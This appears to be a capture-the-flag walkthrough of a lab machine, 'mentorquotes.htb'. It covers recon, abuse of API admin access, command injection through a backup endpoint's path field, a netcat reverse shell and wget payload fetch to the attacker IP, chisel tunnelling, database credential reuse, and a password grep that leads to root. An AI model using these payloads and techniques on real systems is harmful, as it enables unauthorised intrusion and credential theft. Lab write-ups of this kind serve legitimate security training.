Start with Nmap scan with default scripts a version enumeration
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 07:45 MST
Nmap scan report for 10.129.85.230
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c73bfc3cf9ceee8b4818d5d1af8ec2bb (ECDSA)
|_ 256 4440084c0ecbd4f18e7eeda85c68a4f7 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://mentorquotes.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds
Main webpage does not have much to look at. Lets scan subdomains. Vhost/subdomain scan gets us api.mentorquotes.htb Scan see if we get anything else api.mentorquotes.htb
:: Method : GET │
:: URL : http://api.mentorquotes.htb/FUZZ │
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt │
:: Follow redirects : false │
:: Calibration : false │
:: Timeout : 10 │
:: Threads : 40 │
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500 │
________________________________________________ │
│
admin [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 98ms] │
docs [Status: 200, Size: 969, Words: 194, Lines: 31, Duration: 71ms] │
users [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 79ms] │
quotes [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 84ms] │
server-status [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 60ms] │
:: Progress: [30000/30000] :: Job [1/1] :: 387 req/sec :: Duration: [0:01:18] :: Errors: 2 ::
We get a Status 200 from docs lets check that out. We see a potenial user James We also see various GET, POST, PUT, DELETE options. Try to create user. WORKS!
{
"email": "sour@sourmilk.com",
"username": "sourmilk",
"password": "password123456"
}
# Response
{
"id": 5,
"email": "sour@sourmilk.com",
"username": "sourmilk"
}
Create james account since we know he is an admin.
{
"email": "james@sourmilk.com",
"username": "james",
"password": "password123456"
}
# Response
{
"id": 6,
"email": "james@sourmilk.com",
"username": "james"
}
/auth/login to get a token
{
"email": "james@sourmilk.com",
"username": "james",
"password": "password123456"
}
# response
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY"
curl /admin with token to get a response.
curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/
# Response
{"admin_funcs":{"check db connection":"/check","backup the application":"/backup"}}
check /admin/check
curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/check
# Reponse
{"details":"Not implemented yet!"}
Check /admin/backup/
curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup
# Response
{"detail":"Method Not Allowed"}
{"detail":[{"loc":["body"],"msg":"field required","type":"value_error.missing"}]}
Make a test payload to see if we can do anything. Works!
curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `wget http://10.10.16.11`"}'
Reverse Shell
curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.11 4444 >/tmp/f`"}'
Dig around the docker you are in.
/app # ls
Dockerfile
app
requirements.txt
/app # ls -al
total 32
drwxr-xr-x 1 root root 4096 Nov 10 16:00 .
drwxr-xr-x 1 root root 4096 Nov 10 16:00 ..
-rw-r--r-- 1 root root 1024 Jun 12 10:21 .Dockerfile.swp
-rw-r--r-- 1 root root 522 Nov 3 12:58 Dockerfile
drwxr-xr-x 1 root root 4096 Nov 10 16:00 app
-rw-r--r-- 1 root root 672 Jun 4 2022 requirements.txt
/app # cd app
/app/app # ls -al
total 40
drwxr-xr-x 1 root root 4096 Nov 10 16:00 .
drwxr-xr-x 1 root root 4096 Nov 10 16:00 ..
-rw-r--r-- 1 root root 0 Jun 4 2022 __init__.py
drwxr-xr-x 1 root root 4096 Nov 10 16:00 __pycache__
drwxr-xr-x 1 root root 4096 Nov 10 16:00 api
-rw-r--r-- 1 root root 0 Jun 4 2022 config.py
-rw-r--r-- 1 root root 1001 Jun 7 2022 db.py
-rw-r--r-- 1 root root 1149 Jun 4 2022 main.py
-rw-r--r-- 1 root root 704 Jun 4 2022 requirements.txt
cat db.py
import os
from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)
from sqlalchemy.sql import func
from databases import Database
# Database url if none is passed the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")
# SQLAlchemy for quotes
engine = create_engine(DATABASE_URL)
metadata = MetaData()
quotes = Table(
"quotes",
metadata,
Column("id", Integer, primary_key=True),
Column("title", String(50)),
Column("description", String(50)),
Column("created_date", DateTime, default=func.now(), nullable=False)
)
# SQLAlchemy for users
engine = create_engine(DATABASE_URL)
metadata = MetaData()
users = Table(
"users",
metadata,
Column("id", Integer, primary_key=True),
Column("email", String(50)),
Column("username", String(50)),
Column("password", String(128) ,nullable=False)
)
# Databases query builder
database = Database(DATABASE_URL)
Hacktricks Port Fowarding Good read about chisel
# My machine
./chisel server -p 4443 --reverse
# Victim machine
wget http://10.10.16.11/chisel
chmod +x chisel
./chisel client -v 10.10.16.11:4443 R:5432:172.22.0.1:5432
Now we can try to log into the bd we found
psql -h 127.0.0.1 -U "postgres" -p 5432
Password for user postgres:
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1))
Type "help" for help.
postgres=# \list
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-----------------+----------+----------+------------+------------+-----------------------
mentorquotes_db | postgres | UTF8 | en_US.utf8 | en_US.utf8 |
postgres | postgres | UTF8 | en_US.utf8 | en_US.utf8 |
template0 | postgres | UTF8 | en_US.utf8 | en_US.utf8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.utf8 | en_US.utf8 | =c/postgres +
| | | | | postgres=CTc/postgres
(4 rows)
postgres=# \c mentorquotes_db
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1))
You are now connected to database "mentorquotes_db" as user "postgres".
mentorquotes_db=# \d
List of relations
Schema | Name | Type | Owner
--------+---------------+----------+----------
public | cmd_exec | table | postgres
public | quotes | table | postgres
public | quotes_id_seq | sequence | postgres
public | users | table | postgres
public | users_id_seq | sequence | postgres
(5 rows)
mentorquotes_db=# select * from users;
id | email | username | password
----+-------------------------+-------------+----------------------------------
1 | james@mentorquotes.htb | james | -----------------------------
2 | svc@mentorquotes.htb | service_acc | --------------------------
4 | james@sourmilk.com | james | -------------------
(3 rows)
Grab svc hash and crackstaion has a hit!
123meuno***********
SSH into box
❯ ssh svc@mentorquotes.htb
svc@mentorquotes.htb's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-56-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Dec 12 05:21:51 PM UTC 2022
System load: 0.08740234375
Usage of /: 64.9% of 8.09GB
Memory usage: 14%
Swap usage: 0%
Processes: 237
Users logged in: 0
IPv4 address for br-028c7a43f929: 172.20.0.1
IPv4 address for br-24ddaa1f3b47: 172.19.0.1
IPv4 address for br-3d63c18e314d: 172.21.0.1
IPv4 address for br-7d5c72654da7: 172.22.0.1
IPv4 address for br-a8a89c3bf6ff: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.129.85.242
IPv6 address for eth0: dead:beef::250:56ff:feb9:4e9f
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Dec 12 17:10:51 2022 from 10.10.16.11
svc@mentor:~$
Search for passwords in config files. grep -iR password /etc 2>/dev/null | grep ".conf"
svc@mentor:/tmp$ grep -iR password /etc 2>/dev/null | grep ".conf"
/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# security_pass = password
/etc/hdparm.conf:# --user-master Select password to use
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for initiator
/etc/iscsi/iscsid.conf:#node.session.auth.password = password
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#node.session.auth.password_in = password_in
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for the initiator
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password = password
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password_in = password_in
/etc/ssh/ssh_config:# PasswordAuthentication yes
/etc/ssh/sshd_config:#PermitRootLogin prohibit-password
/etc/ssh/sshd_config:# To disable tunneled clear text passwords, change to no here!
/etc/ssh/sshd_config:#PasswordAuthentication yes
/etc/ssh/sshd_config:#PermitEmptyPasswords no
/etc/ssh/sshd_config:# Change to yes to enable challenge-response passwords (beware issues with
/etc/ssh/sshd_config:# PasswordAuthentication. Depending on your PAM configuration,
/etc/ssh/sshd_config:# the setting of "PermitRootLogin without-password".
/etc/ssh/sshd_config:# PAM authentication, then enable this but set PasswordAuthentication
/etc/ssh/sshd_config:PasswordAuthentication yes
/etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
/etc/sos/sos.conf:#password = true
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES
/etc/overlayroot.conf:# if not provided or empty, password is randomly generated
/etc/overlayroot.conf:# the generated password will be stored for recovery in
/etc/overlayroot.conf:# crypt:dev=/dev/vdb,pass=somepassword,mkfs=0
/etc/overlayroot.conf:# $ MAPNAME="secure"; DEV="/dev/vdg"; PASSWORD="foobar"
/etc/overlayroot.conf:# $ printf "%s" "$PASSWORD" |
/etc/overlayroot.conf:# $ printf "%s" "$PASSWORD" |
/etc/overlayroot.conf:# IT IS INSECURE TO SET THIS PASSWORD HERE IN THIS CLEARTEXT CONFIGURATION
/etc/overlayroot.conf:# Randomly generated passwords are more secure, but you won't be able to
/etc/overlayroot.conf:# Randomly generated passwords are generated by calculating the sha512sum
/etc/fwupd/remotes.d/lvfs-testing.conf:#Password=
/etc/fwupd/redfish.conf:# The username and password to the Redfish service
/etc/fwupd/redfish.conf:#Password=
/etc/sudo.conf:# password prompt for "sudo -A" support. Sudo does not ship with its
/etc/apparmor.d/abstractions/authentication: # databases containing passwords, PAM configuration files, PAM libraries
Winner Winner
/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES
Super user james and get your flag!
james@mentor:/tmp$ su james
Password:
james@mentor:/tmp$ sudo /bin/sh
[sudo] password for james:
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
logins.log root.txt scripts snap
# cat root.txt